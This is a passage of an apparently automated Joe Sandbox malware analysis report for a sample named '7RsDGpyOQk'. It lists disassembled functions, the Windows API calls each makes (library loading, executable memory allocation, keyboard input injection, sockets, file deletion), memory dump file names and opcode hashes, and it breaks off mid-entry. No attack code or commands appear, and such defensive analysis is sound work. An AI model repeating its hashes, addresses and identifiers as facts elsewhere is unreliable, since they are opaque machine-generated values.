                                                            • Opcode ID: 0f2d8ecc65289ccc8e7ddb8894c0718e3749e43fe380bcb463ad946052c62b1c
                                                            • Instruction ID: abf2ea895af3568b2b94d2cb751c1072b274b919d10331008bf20f7ba5819c1f
                                                            • Opcode Fuzzy Hash: 0f2d8ecc65289ccc8e7ddb8894c0718e3749e43fe380bcb463ad946052c62b1c
                                                            • Instruction Fuzzy Hash: BCD0C230550313DFC7304FB0E90864672E4AF1A349B008839D8C6C6150D7B0C490C610
                                                            Function 00221072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,002212C1), ref: 00221080
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00221092
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: 9d5a111ad3b342698f439623f26ed921f5a25ecc34e1b75643c1a37fb301d20c
                                                            • Instruction ID: aa287a8a8326888234b357c3b5a2c0dddf37f83fe10caa263235e7e155732445
                                                            • Opcode Fuzzy Hash: 9d5a111ad3b342698f439623f26ed921f5a25ecc34e1b75643c1a37fb301d20c
                                                            • Instruction Fuzzy Hash: 0BD01230520723EFD7305FB5E91892676F4AF25752F118C39AC89D6550D774C4E0C660
                                                            Function 002193F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00219009,?,0022F910), ref: 00219403
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00219415
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: 9515c2b54341c95dd900590ae069a1ede020091603f1d0e182c00f5e015bac50
                                                            • Instruction ID: 6676ced5af4a73e4b536481d91476e73e3aec5d4f075e3330cc1fa65575cc853
                                                            • Opcode Fuzzy Hash: 9515c2b54341c95dd900590ae069a1ede020091603f1d0e182c00f5e015bac50
                                                            • Instruction Fuzzy Hash: 64D0C230520313DFC7308F70EA0C24376E4AF19342B00C83A9885D2550D670E8E0CA10
                                                            Function 001E1B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            • Opcode ID: 8ec7ae80cdcc6fc49a1379490a2c7b20f729a6431b6d3048c436ed214033aa43
                                                            • Instruction ID: 4135825ebb82dce1aa2ad6a286c0920866ae12c9b0291f05db32bb6dc02c840b
                                                            • Opcode Fuzzy Hash: 8ec7ae80cdcc6fc49a1379490a2c7b20f729a6431b6d3048c436ed214033aa43
                                                            • Instruction Fuzzy Hash: ACD012B5804559FACB5C9A919C45DFE737CA715311F550692B902D1000F3349B959B25
                                                            Function 001F76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c5feed2cd76f3618520bf0e346b002977a3a67501c07aef36daa037e0839b81
                                                            • Instruction ID: bdab3fb43457b48306456fd2d17560cd67f594f833d9d2612bdd301133c88e8c
                                                            • Opcode Fuzzy Hash: 9c5feed2cd76f3618520bf0e346b002977a3a67501c07aef36daa037e0839b81
                                                            • Instruction Fuzzy Hash: A8C18E75A0421AEFCB14DF94C888EBEB7B5FF48714B158598E906EB291D730ED81CB90
                                                            Function 0021E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 0021E3D2
                                                            • CharLowerBuffW.USER32(?,?), ref: 0021E415
                                                              • Part of subcall function 0021DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0021DAD9
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0021E615
                                                            • _memmove.LIBCMT ref: 0021E628
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            • Opcode ID: a56fb83fb2102511d6c8829f8ee8c55c8e910bee1bc166be3aacd798b2cd447e
                                                            • Instruction ID: 5e2bd06a42b917b5ce9a510243e3e08186d6d6631388cb6101938e26ae8de107
                                                            • Opcode Fuzzy Hash: a56fb83fb2102511d6c8829f8ee8c55c8e910bee1bc166be3aacd798b2cd447e
                                                            • Instruction Fuzzy Hash: 3EC17A716183019FCB14DF28C88096ABBE5FFA9714F05896DF8999B351D730E985CF82
                                                            Function 002183A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 002183D8
                                                            • CoUninitialize.OLE32 ref: 002183E3
                                                              • Part of subcall function 001FDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001FDAC5
                                                            • VariantInit.OLEAUT32(?), ref: 002183EE
                                                            • VariantClear.OLEAUT32(?), ref: 002186BF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            • Opcode ID: 0f7bd7a2bfec58502b18780d137fe88456280b8a01dd3b95a08ea9b68bdca6e9
                                                            • Instruction ID: a6dc9c1594ab5b9e1d81e80c123bd01fc020abb1240e3c28b8c978ec0010417a
                                                            • Opcode Fuzzy Hash: 0f7bd7a2bfec58502b18780d137fe88456280b8a01dd3b95a08ea9b68bdca6e9
                                                            • Instruction Fuzzy Hash: B4A15839214702AFCB10DF14C481B6AB7E5BFA9314F14445DF99A9B3A2CB30ED90CB82
                                                            Function 001F6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: a2b1fb38ed059fe8e7f93913f181536b5adc2d10b7792c1534cd1e634f412232
                                                            • Instruction ID: d4afde9a1404660bd67a6f246066302add818ced819efbba801c7eb6046f5384
                                                            • Opcode Fuzzy Hash: a2b1fb38ed059fe8e7f93913f181536b5adc2d10b7792c1534cd1e634f412232
                                                            • Instruction Fuzzy Hash: 0B5196356083099BDB24AF65E895A7EB3E5AF59310F20882FF756CB2D1DF709880DB11
                                                            Function 00229A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(00B9EBC0,?), ref: 00229AD2
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00229B05
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00229B72
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: 6be4cd5ef39df9a10ea64fc53cd72c7ffa3165072453d966912e7e957c9c3e58
                                                            • Instruction ID: 6e1cb1dca10d5b2a51c258f3de76066bcb93a4958a02180f98a980c97c22b15a
                                                            • Opcode Fuzzy Hash: 6be4cd5ef39df9a10ea64fc53cd72c7ffa3165072453d966912e7e957c9c3e58
                                                            • Instruction Fuzzy Hash: 98516334910219FFCF20CFA8E9849AE7BB5FF44324F108169F8559B290D730AD91CB90
                                                            Function 00216CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00216CE4
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00216CF4
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00216D58
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00216D64
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            • Opcode ID: b803e27529a6e4f73eac1b5f8c493e3a4d7921ec9487ede4fb3d7dd4101be35a
                                                            • Instruction ID: 3cd1b3b9efb0e14e4c64bccff95e5d950d8286cbe03982aa0745a566d139afef
                                                            • Opcode Fuzzy Hash: b803e27529a6e4f73eac1b5f8c493e3a4d7921ec9487ede4fb3d7dd4101be35a
                                                            • Instruction Fuzzy Hash: 0E41B279740200AFEB20AF24DC8AF7EB7E59B15B14F448058FA599B2D2DB719C418B91
                                                            Function 0021672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0022F910), ref: 002167BA
                                                            • _strlen.LIBCMT ref: 002167EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: 032364bd58a95f746579a75fba532ddd8166d0bad82645d681c1b1355fc17f65
                                                            • Instruction ID: 3149baa55482509f82b4dccd44bbc86bc88e09882897c2a1fc13feb24ca9d9be
                                                            • Opcode Fuzzy Hash: 032364bd58a95f746579a75fba532ddd8166d0bad82645d681c1b1355fc17f65
                                                            • Instruction Fuzzy Hash: 6241C635A10104ABCB14EBA4DCC5FFEB3E9EF65314F148169F8159B292DB30AD95CB90
                                                            Function 0020BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0020BB09
                                                            • GetLastError.KERNEL32(?,00000000), ref: 0020BB2F
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0020BB54
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0020BB80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: cf63b73020f0504fc4a7bc36ac16f15ad7d11b77d5683fcb8eb443aa16712fd4
                                                            • Instruction ID: fc56dd00ee71abfae52d3b5a882823fc89ec323a3d3830d7a0106485c55c3bda
                                                            • Opcode Fuzzy Hash: cf63b73020f0504fc4a7bc36ac16f15ad7d11b77d5683fcb8eb443aa16712fd4
                                                            • Instruction Fuzzy Hash: C7412939200611EFCB21EF15C584A5EBBE1EF5A314B098499EC4A9B772CB34FD41CB91
                                                            Function 00228AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00228B4D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: bf7d4a3d486b905f41b8c874d11e3124bb93ec84e2f32d722d623c158b16c18e
                                                            • Instruction ID: c311cea96d1241d01e6881a6198d36e301c84c930c95062766b16be61f032a25
                                                            • Opcode Fuzzy Hash: bf7d4a3d486b905f41b8c874d11e3124bb93ec84e2f32d722d623c158b16c18e
                                                            • Instruction Fuzzy Hash: 0B310875622225BFEF308ED8FC49FA937A4EB09318F54851AFA51D72A0CF70D9608B41
                                                            Function 0022ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 0022AE1A
                                                            • GetWindowRect.USER32(?,?), ref: 0022AE90
                                                            • PtInRect.USER32(?,?,0022C304), ref: 0022AEA0
                                                            • MessageBeep.USER32(00000000), ref: 0022AF11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 943f73b06b4ddaaa75b08013c1ee7bd341fe33cb3815d7ecc7a4bc55d4cfa71f
                                                            • Instruction ID: 3232057a04ab9ae8a6610d5871b77184aae5a39e404398dbc4a93f69314a0718
                                                            • Opcode Fuzzy Hash: 943f73b06b4ddaaa75b08013c1ee7bd341fe33cb3815d7ecc7a4bc55d4cfa71f
                                                            • Instruction Fuzzy Hash: 2241B370610126EFCB11CF98E988B69B7F5FF88310F158079E414DB651D771A812CF92
                                                            Function 00200FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00201037
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00201053
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002010B9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0020110B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 5863ec0f220a050fa624dc0a8027d935f3ff5ed16c9f4f39cad6496eed0fee26
                                                            • Instruction ID: 45087ef06b969f3455259c09cc1688410d37384b1035bcc795ee87abbfc2d696
                                                            • Opcode Fuzzy Hash: 5863ec0f220a050fa624dc0a8027d935f3ff5ed16c9f4f39cad6496eed0fee26
                                                            • Instruction Fuzzy Hash: DC314830E60789AEFB348F658C09BFABBBAAB45310F44432AE9D0521D3C37589F59751
                                                            Function 00201121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00201176
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00201192
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 002011F1
                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00201243
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 21f0cc54de11f18025adc497cba3f146cd7743b2ade71304fe1e1dbb36fcad1a
                                                            • Instruction ID: ba38297751b9e931939dc27d4935030d3ca774f0580ff51be8f231cd08baa6ce
                                                            • Opcode Fuzzy Hash: 21f0cc54de11f18025adc497cba3f146cd7743b2ade71304fe1e1dbb36fcad1a
                                                            • Instruction Fuzzy Hash: E13148309607196EFF388EA58C097FAFBBAAB49314F04431EF584921D3C37449B59751
                                                            Function 001D6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001D644B
                                                            • __isleadbyte_l.LIBCMT ref: 001D6479
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001D64A7
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001D64DD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 4d62530565ae939358a3e00ad6c9a441797229e6324d1c44e882953eefcfec2d
                                                            • Instruction ID: e52b01db767bc69bf1fff32e032eba32f3d5eecf4dd60d69b96c4a1f5ada30d1
                                                            • Opcode Fuzzy Hash: 4d62530565ae939358a3e00ad6c9a441797229e6324d1c44e882953eefcfec2d
                                                            • Instruction Fuzzy Hash: FE31D131604256EFDB258F75CD49BBA7BB5FF40310F15842AF864872A1EB31D891DB90
                                                            Function 00225175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00225189
                                                              • Part of subcall function 0020387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00203897
